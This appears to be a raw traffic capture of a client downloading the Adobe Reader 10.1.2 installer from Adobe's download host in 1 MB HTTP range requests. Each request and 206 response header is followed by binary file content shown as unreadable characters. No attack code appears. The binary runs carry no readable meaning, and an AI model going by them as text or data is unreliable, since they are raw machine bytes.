..2.9.... ..)qqC...h..u....3..>7...a...L....2.yU3.c.;..c..j...`(kV.
.....1!Z..%......7....#.Q%.. .n.R.@OWN0$67.1...I....Ew&.....Xpd..8
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=4194304-5242879

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:51 GMT

Content-Range: bytes 4194304-5242879/53784984

Content-Length: 1048576

Connection: keep-alive
.......;[email protected]..*BlZe.....4...'&
4N...7....."@.Ib. ..u4.8. .z.....O....w...S...^..-;.<He.Iq.X.ZV....
Z.. .u7.6.E..$...s|V...f .t....@. .v..K..^..p&..y....M....h..i.....O.;
,_..g....g......R0....p...yD......E|j.#...x....80...>.... .......~.
..{....A...Pgi..P/~r7.......M.....k..[......6..."#.....3...J.0..... :.
.q......kMF... . 0.?.zI=....E.....%.a.$..|T.i.........(...<...l....
....U.>.t...s.?..^..\3.l..].......P... .a...:s.A&....]Jf.CdS$.@q. .
...].%[....'k.G ./....d.Q....>...."..p....NJ..n[.,.gG..6.oMU...U..y
[email protected]...|..@..'. -......lB...-KU.....;.1....7tI....s.1.......8..M#k..4
i.8m.3Y...u..6.[.......i....N.V!..)....s.-.,..(....7..y...h.-.'..o..n.
...`O..U.k2.r..w0..`.....f.v*..;..l..f.&...K$n........u.f..vp...j.$.hj
.4..A..D..q.s...rI.....YA. ....R.>.^Y..y.CH6&.^=.............,.0...
.H;[email protected]?I.~|p...I..3u..?.aMe.]aU.v...I.[......2...(....O..l.n...y...
.s_.c.}...eF.*...;... [Cl..!..1........}B.}.8!...g.j........8.  .]..`.
.K.* ..M.q.....?......r...e.G.V'a...3.....<.l.......} .....J.$...h.
@..ES...0Uo. ..(....x..*^XZR?A."...R_.D..H...q....2....6....*m........
.. ..]...Fr..]...`ê..S...EG.. .GCO......}.......k.mDx.}.....:.k...C.
|VMrz.o..[.. ..g;.b...........2.u.....qp...<..{.....x....H.....*...
.E.. .........p........8`.S`.w|p...z.......-.ta..rt..z_....X....&{.4..
..A71...!.Y6:[email protected].....<.g/....Y........
3..F.C........xm71.q.U.x.D.`r.?}.:#...:O.N..G....P..T...w..|9...G...I.
@O..~-..b.'..aa"...'........rR0...-e.c.j$....=.#..:...../.P&"..$?.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=5242880-6291455

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:52 GMT

Content-Range: bytes 5242880-6291455/53784984

Content-Length: 1048576

Connection: keep-alive
..........q0C..}......t..@[email protected].^.fF=...X"
....s.xj......=E........I....... ....l.2.3TL..SO.|...$.r72BT...x.C.Y.=
._.$...........s..r..!%..6_wwrP(.A.;.h.D.e.2.....q.......T.....^.]..N.
......LMwY...Y.L...Y.E......Y6\j.-._^f......(2....f.\1._.V.l7.}.;....Y
...&...wj.....~.\[email protected]`t.........=..A......o...5....y...;a.:h.....J
F..q..x..b..:.E.x..5a'........#.?...1.3.:.x.......i.c..E./0f....m.6...
yf.I.........6..).). .5f....[.Ne...U..2.o.i...2......Q....1.Ip;.{.....
.....)K.....<.#.. t>.UR..K.so.m.vUN?YU6]..........8.1.....<..
.<;`..s.4.@L.. ..HQ^....V........... .Q...eY....q...\K...|.(.]...W.
{@.....b]..!8t..J\wG.;._}....)..Sp.bW....2.....{..<nk.U...& .z.=..-
.....IZ.I.....L.=.].. ....wG.J....Q.......=.Q....g][email protected].,.b
a....B.d.B..k.......7v.DY..s..R..9c..w C...(=h....p...JV3$...*.`..f..1
[email protected]..%"<$..._Kk*n..5.n...k....oN4...M3(S..J.......m9U..T".,`a...
.t#.K.&3&...}.M=....p..0..b...e.[ddo-s.".a.s;........Z....OK..8P..v7qC
*.Q1.>b......U$...LDU~m..*....t.....b.....p\..J..,".!.r...;....9j.Y
.>.Cu.-V....Rs.F.J..%..2..l...q`I......:Vy.*[email protected]
.4<k.{-...B.x....M..l.s`...,.L.....-...l....k....{.;..4.<:r.U...
..q.BM.]K.6.R.c,9&#.l..~.P}Y.lofI...{.....&.....2..|....b.>..4...q.
..F...2Uq6R..gta.*8.V....^.o.(i.&].n.)..L.#d.xJ...}.o(.......)f.1..Q..
._U......7.J...a.._k~;.H.%...yYCeNg.T..2....._..c.i{Q /.5..X......O.V.
......... .GGD.....V....n8sm.TBO.7x....{_..d...L...s_d....D...",zdp...
U......$#b.M...q.u.........d.bL..g..h7.^.......:G....m..u[.>.*.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=6291456-7340031

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:52 GMT

Content-Range: bytes 6291456-7340031/53784984

Content-Length: 1048576

Connection: keep-alive
.R...K.......B......V)kN..KM.<..D.x7h....1.....SWP...%D...d....[.B.
Y.....0..x6L.H.....&F._.D.A.e..o.....gf.......`eK.o{d......L...8f..;ae
..kNY2....<.........l..M.R.*.q.[....z...Hh..a...6..Q...7kJ..l[.$.`.
8..WqA.3)C.c.Su[[email protected]....?.a.`.....[[email protected].....?..
..........N..X. ...iT.#........WW.`[email protected]|....H..........6..x.....U..
.y%............9Z.`r#...i.......}@..4.[f ..pN..e...:..U.......X%......
_F....y..)...^......m...z.|.z.Q......k......7..{.1;..S... (.r..zh.{W.|
..&T.P-..........J.$.t..i.F..._....A( .k.;.<$.u"..m6.Q..d.5E.C.....
.>.4.........x.......w...;...J.g.......}..\I.>h.-OT,..I^...K!=..
.Z.5.3..................A..P../...1...bV...p...U....gl>..R<tF..s
}.................t.xZr...z..l.h.....CyX ?.~...9.....X.F9...=..&.*....
......Jp.._?N......k,T;r...k.D..#....f.....T..*..r..v....."[email protected]....
.......l...Q..Y6<.-.Q=.4.B...2.=/.#[email protected]
v.....n.0...&-...._HmL......6..al...)}q.H.x.....O.?...Y.=.i.[..28.v...
]3..r...V..i.km.gK............%........q..I>.1/M...e.._....O.G...^.
......~.......B^..U....K.........u.o..O.......[.....fZ.F........f#..".
.b....=....=Ts...h8.i.....~=.Y2=....1....T.&.c5RNf.U.F..},cX.mE&.....~
..0.,5..`..! Kd....J._g4..1...vo...Bc.."[email protected].
..#....d..x.B......a.S.. .gcd`h.m....N.kc<?..p..9jJ9x0...,U=...8>
;...:V..}T.7:...3......I..M....R.p.H..<......{j=%#_...t.v...A/B.(..
6l.3.].`........:..d.....x.s...aU...Z.A......l.{.^...P_..`...D...)J...
..&...2... .q.)..^.u;...p....qP....["O..'.....,J..O..Z^..P...4b...
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=7340032-8388607

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:52 GMT

Content-Range: bytes 7340032-8388607/53784984

Content-Length: 1048576

Connection: keep-alive
*.,[email protected][email protected]..@..'.........gH/....?....A>\....yuZ.;N..g.
...?...LIVMmdu....B...<.o......^b...tQ...~.(l.oS......|Q.[.._N..N..
Fu..BTr....).A.X.({..i.....R.h......R.*.....mI..W.;='.<.pEO6..w..m.
.....Ic.......WM..3..`..\5^^..y...}..a...5U:.Uq..T{..q.......*o.d....i
....Ob.3.`....<........e."A]u.1.6...F.L...H.....YI..do.D...........
Gn.D.....jl........0(.}.*.{.\....i..:...S9$.C&. G.?m......o.q.0..P....
$.....o....7G...d.;.<.....Q...0'\...R..........C/.E3..s../.w/......
......LB.q?.b...|..f....Z...gT...(..s.{.kt6F.mxE A" 8.O..D>o......D
...S.i.l...AL.=. i;(M...A.I.w.....7mB....>%........z....OL/J.%Re.]/
.k.#.....f....BOqt.oLw...^"..oI..V...7..1.I..^q.W0g....x@.............
8.se...F.*...WO.%.55b29c.:l..`QX._<[email protected]$........)..'7
.f.Z#.4....*N..l.....*S.........x.0.$s....&j..R.y.....X...;....*.f....
Y6.].w..v@*u!....d0...M......{.Ou.2..P.(.;e..5....:....-\...C.uR... v.
.-[...-..u...{^..*..#/."..C(....%...^..O.......!.x.......o....g).a...N
3Ju....rk....}......<.d6.....~,.../.9...9..L.........~NA..J.4Y.j...
f...]...._......1...2... l.U.G.R...EmE.&?VW.o.<>.%.fu..XZ...h...
(.#,....X1...............{i.....b.......&J.M..bA......H..f.xv..LweZ..0
[...Y.....S.....Qh.....JW..<.....Nf4n..nb}Y.n....x.$:J..>=....d.
i......B.M"..X.~ZU.}sa.....a..{...t.v".......9..A..:P....1h.&./ .X.P..
...^(..H.L.2...z"......%. ..F..LV;.}..C.n.~.j.. sS.._).is...P..i....q.
.4.4......,.".......6....TYP.o..(pDeiHZ. O...4.!75~.t.......e...Y.....
@.....:]d.Q.@..........=.!...*.|.^.Qx.\)..N.........8)l>....X;.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=8388608-9437183

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:52 GMT

Content-Range: bytes 8388608-9437183/53784984

Content-Length: 1048576

Connection: keep-alive
9.........o....u{.y.Wicr.....o....k...u.[.*Y.-~Tp z.....O....PS.I#p{_.
..1.NF*A..>..W\...s>.?&Z..X..w..w......S!f...g.ZK..e2vi.5.0.o...
....p{._P.?...m.. 73v.v."...5R.e..4..GJ80..R"..dKE..v$.....]3E..KsV1.&
gt;...C9.;r^.G[..W.b~?#......d.Jd."[email protected]...%..R8.c O(..h.....
.q..'Ij...../ .n,H....m.Y.l. .R...".p.y.Z..O..x.D....O=.hj.L$...;)9...
.......W..,h..v^....s2>;0...s.......I.^...._......_........l0.pZ.P.
l.........Ge....oA..&.=...../.N...8...V....z...a..:#.!.Y.G.........1..
.....9J....u8....A..c.65.VG..\..n..|..}>@z....X7`..:.....)..;._.kAw
......<6...#..A.$-j...y..........G..U.....7.a-...i:....Nw..Ft.....I
a.O.\../...b,eg.I]..qJ.s.y.\....Sz...................Gd...(.zh.er.2;.]
..h...G.d.x.2........7....l:7=..UUm...X.. u."..Q...tp"...Vq..C........
..P...2.T...>.C.`..wk.J.qi..tr.,..._'r....U....<B.S.`.ayn=n....Z
{....Fv^..$..nX^#$[......>j.k[M......c.. q.....X.....`b.T...$.$...5
.N.).U'.T."....c./YH..v.I..:&......A0DrF........7..-...>~4{'.RI!..G
.^....C.k.....z...I...yiC_.......>.{....b8...|...........fIIf.`.b.5
.I......?......Q..Z....t5!8v.$..n...6..F....\.m.......\'.Y.?..b...H...
..$.?J.......R....Df0s.......H."..<.k.....{.Ak..../.qj..&..../.F4y.
..o..Jl..}.o..|.f....n.]Y.......-....I*p./..O9...G.(L?{...|.....^.;;.C
..."...g..$.....L..1R.'2f.jKUF9..........k..&'E.D...QY%p........?.{s.Y
V.\].K.R'.................L...<....e,UU..k. *.oi...LH .0.a.LQ.;.3..
..........c..O0T...P...S&B.~&gM...R.w...Z....bc.3.T5WV.....{g.$.."..k=
.RFU`.T....&...T.a4..,....$.f......GZ.0..d.<9....}<\..;.b...
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=9437184-10485759

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:52 GMT

Content-Range: bytes 9437184-10485759/53784984

Content-Length: 1048576

Connection: keep-alive
$9=........d..dZ.A.....$..."h.....e....V..'.~..9...{R.L2;L..}.l.'.$...
'..3..5ak.......J........L.:u.....'..5T...h64=........Kd.\.~..[.....7.
:..%Y...A...Q.Q......m.....x....!.I.x....$...Y.V..^..U%........h.*... 
-..y.M../..a...N....Iky.........a1..7i...do3.T..n.{..f?..;..C[]..@$.D=
..\..N...E1...n} p../.......VE./.c....9e.J`.b..S.].%....!...}m.Xk.....
].z.....w#..v...5.ez6o-gm...5. ......@...."3....E8......6....&.F..dk;t
s..x.<.0>.3Y.x...7..`..7......w........(?..`.G.3..l[))R.k?W...g.
..O\....oo....?p.G.]..;B.0 ....o&....~.G.Ua%t..C........$..{3..G......
<2..V....z.5pG...#[email protected]!.,..&@.)...?.8..b...c..
.....]N......s....v...*.pQ=c!..Zx....V...x..}.T..J...[.........n..=...
VO..?;..BO..!`'.c......i(S....W. ..._%...".d._Y.:...w.seU..z....6...qy
..W"@l..........(`g$3...}.}C].......x....Mq..n.....c.Sq...[..1I...]E..
0...0tn.s.U.&.x.."R)L.h..x0......S.%.i...-k.r.5...._R.....-tH12a...Cs.
..cC...}=i.Qi..*...$z......L.QI.N.x.......&G2$....T....b.-C./Y..}.wS..
e.4.U...1..J......&.(..........X.....e8......e.K.X}q).U....j.,.gqJJ .)
|..I5...17...9...;.sW.#T.O..pu.\6....r.l,|......k.-`....d.............
S...H.:[email protected]..,N......O.....5u..<...vf......|.....i.D
.......1..2 >./u.Z.U...kM..{t.... ....z..j...{.:..e6.5.D;<...h.a
....I|;.gW.......^.(..w.O.s ...l2.....A.. .......k.........'K..P}...z.
........#f"..5a......f..&V.4[{.Z.39M..T...QLp.rI=..i.x.D......z.j4....
]...=T.m....... '.y.tE&k. .|..E.....T......)..R..PU{G....do.Xt..#..[$.
...-..f.... .HP.....bU5I.>XDML..pD.K.I..q..*E.L..$(!...$Lb.4-O.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=10485760-11534335

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:52 GMT

Content-Range: bytes 10485760-11534335/53784984

Content-Length: 1048576

Connection: keep-alive
.Y[..&....h r....T.!..3$.}.51.z.R....."..G..L...S..M..o.W.59d..E..,5-.
d.`.D...h.xK..L.&Y..(...p..$.....)..DHT..7.hqv}&.........$c...^....O..
i#..q..,.*.v....)_.....G..Th........y..m....''._7....b%...u..)Z....=.D
.T..N..$)A..>..d..{....e....S....{.GF.`..rr.js..Uz..E..\M.....4...E
...g..z..`..&q..*...PP..vD";m."U...7..Z..*H..2,_.Ur.L..{BdW.19.%3}.7.]
.w.a..)...MI.lw.(.%.t.K.."....u.DR..e....m'.W....:6..n..;*#,^{... ....
."..lv.t>lC.8.. .Z....M.[.vK0.s...^5.2A.....f..m..:H.K..0K:....l...
Of....fo.." ...DE..%.Le.*......|.7.....N..1.."BV.|.M.LIv.z....o..-...]
W~6.d.s..|x..pv...:n(..X][email protected]@......l/..A..2....b..aX.D..
......nzG.I...;..q...='....OF...>...#.u*_.9.{...4.Hq/.......w..fx..
...<.0/&U..#Y..U.3.>f....~......<.c....^...}.....'....Y..G..e
.......f...i..k.s.3.Ff...2?....]...$..Co8,...F..p|;.u.....N?...#..J.9.
X..<....(.e.R..$.Bd.w../..........$Ff..B.#]..X....?.._M..)..'..N.$.
Z&...&.9.n.j...}o...F.8..Bw...b.,.Fqk.....W.4.Y.....u...8......D2....I
}.6c3Gx....~..b..t....k..3.;...0..z...<O...7X.....f......c.M&..f..n
.......O.W...~Vu....d.F.....={.F.:g!t......"39j...^tS(. .V..am..~h.n.q
.F..`..<b..R....3.x8.j.F(...;t!.V....<._f..uS.{.M.:...JQ...c...0
..(.V.SsW..>..\..........b:}:..B.........r..\...#....^U....*h/.e..n
h<...}}..H.l...........1.2...Br.=.....a./.U.>..:3;.d....83.G...V
...p..j....3..\.q....c.2...!.`!Z......M.p%.Q:.....\.tJ.fOj..{...N.g.=.
...Y......u.......O<....0.<()..0....n.(.....~I..P.&K.|M..w.0.|J.
...).....`....8hO.u].r...!...A..7.U....._2..!%.._%.....1".m.o...,.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=11534336-12582911

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:53 GMT

Content-Range: bytes 11534336-12582911/53784984

Content-Length: 1048576

Connection: keep-alive
X.:.....[g<.{A...N......[.,.v.[s..PS._.a......^a.C^Z..2..Y....7....
........._.r...wnQ2...&.v......[i.?..(.Rt...\.0....[.%.lm.........1^..
o#[email protected].&D..........F4D.$...W..mb...F.5..Ht.e,.G,....
MoP&....g (.}..`.m.~%.u B...Q.....9"tl.......;..";n"..I$).Z.{..5..'RSX
W9.g....tj.y.4..!/.Y.l..z..>_X..... .l.>%}VM.....I.Z.0..1cjQ ..s
.l...?...H......./bRi......U..l./....._...Fl..^*B .w.U.E...  ...H..n'.
.v..m...\7..Cg1.._MP8...v.........9)...s(_..lm..47........H=6...]9/W.5
1..)M......-... ...w$..z...[..C.....x.:IJ3.....P.9.a.=G....!.dxl#..8'z
...K....o(...y.......}.W..G.. .6.]6&6...?.........~. .x... N..T.|....;
"..X!..8..7.G.\...t..a..X(.|........AZS.YE.{....<...E]Vm?.>....e
...'...S.......Z....GzZ.F%.m....s....r1...).a.-^.nLE.-\.......[Q......
.... p<e.J..>.r .wR...n..V....0.y ....o[...F...|. .\v..D.Ip.Kx.D
.....Lc..D S.E..W&../b..`C.[.......m..k? .~...Gt...P.F...RO.C^.....~..
.."....B...P.]......T..k9_...'R.....z...QA.".Y......n....7.5...2...-@.
.^1wW..,.9|.I..95f]........v..3..>^.. .$..=.X...........Y.]..}N....
..j..)M........BQ....P/..D..|;.g.T.E.q....h../....:.....P.w...uj:\....
...nT.W..-E. .QTV..(`dH.............g...).SvREc...6.......L..n.......(
...^>5..5...R...oD....l.i.#..........h..V0....Q!.W.)i.Xe.....].....
N...Z..f..H........\o=...6.(/}...C ...Z..6...).).1..=.[...#..{\.....x*
.0.{........1/.&..x.m.mn....dPz4z....jL.R.....7.0....].?.3sI.....z$...
.6IG.H........0.).I.x.EG.....l.u.7?.d*..).TN!Z}d_...)..b.....*b...6u.a
.......:.x..a..eGu..<...'......g.K....G.....l.%..G3.._......|F9
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=12582912-13631487

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:53 GMT

Content-Range: bytes 12582912-13631487/53784984

Content-Length: 1048576

Connection: keep-alive
,.(@.s...1.Lk..J..vA..j.p....>....%....z\.. .~..g...n8.Y[.........U
..,..u.J.........d.0.W..T(.v...P..q..C..?8..u.....x#tL.A..Q.."....09..
...^..Z.n!..)-3.../...../..F%.,..~.>V..:...Z ....O...E....Y..8.[...
....C ..WXt.j.k.9...YUZQU.K-.F....h.\...ZD'[email protected]..>}A\..'.RH`&
W.~C...M.;.eG. ..W.#q.cl2z...M.Hb.F...Z.?.......'...........`..N..=...
.....H.p........f.#.&,.|4ng...@..\u....R...........u.....'....>....
.ay..0...U.7"Q.........X.........=.*..Rm...I-..e!.]..wxy"..^...t..v..5
....4.=.=-.Q&.p..3 .8.....).......Z#... 6.....ix...1.r/. ./....cC.V...
.G.{....p...;jZJ...]...l.....@@.)./g......y.....b.f......v..>.,....
....0.|(..,..`..p...........O.f,..bH.1.p..n...m.ID..m....F....y..o...C
J|.E..p..U....5....]..I..d..v...5.f....-...4......<.5.0. w.J.gL';.'
-.L.. .}..0Z.I.o.IIu...bw..P...P....T...!.....Ej..8......B-.A..]wl.zV.
.]..^.C....e^.. ............k"J Piw..^.S.u%7..W.......R....v.....R.4&g
t;._&^..q.sA F...'.}.S......t).;.GjX....D..v.../.[...}...5y.-s.....D.g
Qb....8.z.Z.....=.W...r..o.8....v......No..i>......#..fGZ....:.....
.B...........#....Y...Z*...>,]. ...R[H..K.*...T.-...8..d..R&./..4.C
.,.'... .:...T.V|.."..|P*.~p....lS....>...`..4X.hA2V....vw.&).u&.8]
vD7.O..#.xMS...)'....Ds.k.4..r..q.j .}mc...i{r ....b..W\..>|FO:e...
....}.e2S#..U..{v....0w.q.;...5..0..[...d..}&...X:..5r..k.E.qy....$...
?...R. !...q..........BV.RMu...|]...W'..%...3.G.|..K( h.....l.........
n.T.........4..(.U}..h.z.|..._t&h.j...0...L.^....x.....U..(.C.&.-..0k.
A4-.g.iJd*....7nPu3..W....l.../......<........<....'.F.=9...
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=13631488-14680063

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:53 GMT

Content-Range: bytes 13631488-14680063/53784984

Content-Length: 1048576

Connection: keep-alive
!#\..C.m......."`<M........Fb....1..>.<...#...xo/>...S.C..
.HA..D....H;..A...n.;....7,......-..B>q .j...;a..y. _\..zF...C&7...
.........A...e..iY...83..6=.....N.m'v.~.r.a.....^O.k.v1...r..5..[.Br..
...I..M ..h.*.1.9..H.v..{....WN.#T.u../bUk-...B.`..2^.[Q....5..D.....Z
M.W..q..@...."..Tg$,..Y{0.PD].....~...>B........K.QY31W:b...b...W(.
.;..Y.`....?.qLg.`..$...h....A...4.B..j.Jc...[&..0.|....SpO~...... ...
|.m.5f.....v.p..o.T..UZ.....v........>=/.$..cG..XQ..\R.rt=>.....
<...d2.q$......f...O.Wh_..F..... .....|.......>.2..8.L....<6.
. H.|.... .b..0.e)i..2.....p...HQ...ik=.....].....~..&..K.$.X........y
P...8..Q..hW..f_.......0c-....Tiz_A.....5.$..W*.lW.....;.I.D*.nT...*Mj
.OZ..|.T ........D.n...".........cv.p..0...Y*..s.........~..t\e .."8 .
AW..M`kB.K.3?B._...^~...%...,..>B...O{...2_....=V..ay.4...,.7{..X..
.}/P.c.......4..^[email protected][vmz..L.........v.I.cMz}hk..f...qP..if.z)...1
2....T..i..V....Lo.e...bHP|.R.^.W.0.............@`5g.P.w.?].y........#
._..l..(/J..@..."......_.Xo...MX...4..O.e.:.xV..r.i..DT....B.....I.F.8
....u.<-.........z9.'...$..?s>!..Z3?......Vb,Y.) e.....x..2..*..
dA\. .P..f.........3aI....b..j....VBc.%...XAir,..;.4.m9....<...|.G.
..iu.....f..SI...ot.`.Wc..X8Q....=...$>`....CQ.wO.B.%./'P.....*,].I
w...[._zp.a.........6....!.F.V.K.rT.S%O...]...q..s".... ......KQ......
K{u).P.P..F..M.H.Y~N.v....$,?a......X... .....z\Q.G.`.........7C.-;..M
...i..0.VR..}~.C...k4......Qv.Pt ...\...k.{... ...!N.._....d..$.....7.
.... HJMf...'_UI.US......p..z<.j.*..v ..Z.....b.....5#.......m.
<<< skipped >>>

GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0

Accept-Encoding: gzip, deflate

Host: ardownload.adobe.com

Connection: keep-alive

Range: bytes=14680064-15728639

HTTP/1.1 206 Partial Content

Server: Apache

Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT

ETag: "334b198-4b5a36f1841c0"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Date: Tue, 05 Jan 2016 06:38:53 GMT

Content-Range: bytes 14680064-15728639/53784984

Content-Length: 1048576

Connection: keep-alive
..j........'.... v.....r....x=.......p..u].79...)/..&...7.eR.U..37.h_.
w.g.6a..}...J...r..=...(.kI...u..b<.9..~.A....T...A.g...Ux.........
..'...s...M.\....8.....6..`......&....3@;.j....U`.....|..X..wVM~V....d
yj...xm..a.Y.........^..<l..-.....~t.mdL......C&5.`wcI....q.BL.g.58
.......W.w....... z.bu.7D....a...T&..7./2.r...Ch..G..9O....y........@.
>e.C..2<.....*[email protected]...:]..=.N.%.. =....[.
..I......X9<....L:).M.wzE..8.#.........K.....1....81-:R.p.....>.
4'|.H..9T.... ..9....\..6.!..z... ..E...>."....f....H.}....&...|..a
......VF.l.*.i...a..l,C..b..b..=.."..O..3..|.........jh...9.I.V...;.{.
z.rR.h.$U..#.....T.....9"lb.?FT.m..].c.}.. .r..Ql...,Ub.Q...)'-4I....`
{./[email protected]/.#..B.k......J_....=...?...WB...=..W..... ._OP.gR.I ...H.f
0I.uI......=..VV.. .....G]..:s...h..?....V......&.V.@...._.......9.S.!
...Bb....XJ..b.K.%.}.e.......2.....k..*..:..._]<r....3.............
 [email protected]^..JCJW...X S.1......,Z.xR .FB..mn[.....%n...H
;~..y......b.1. .g..5.B.G~.db.c............*9 b..."5..}.v..f.........z
.g.E..`Z-...l3?..0...@V(.[/.....T.&s.i....#.....g.Aay...o.0...........
.2.r8.....-.H.Gu-~p...7.R7...&.....zw... .k........... |.0C.pFy.hE....
>.\...._......MC..e....O @rU]...nk.C.5.K.-...9.i.B......}.j]...gX..
...,.K..|...........KF.Eg..i ..}..9O 2..<....$.9..'FU.8wY.Sa]Q>.
.&...@\......mjN.5.uC..T...V*.a..}.).....}...?......z.).|.a.B...>..
......z..z}.....L.w.$.6.....Fe...x.c.... ..r..U.....q<...b..:..x...
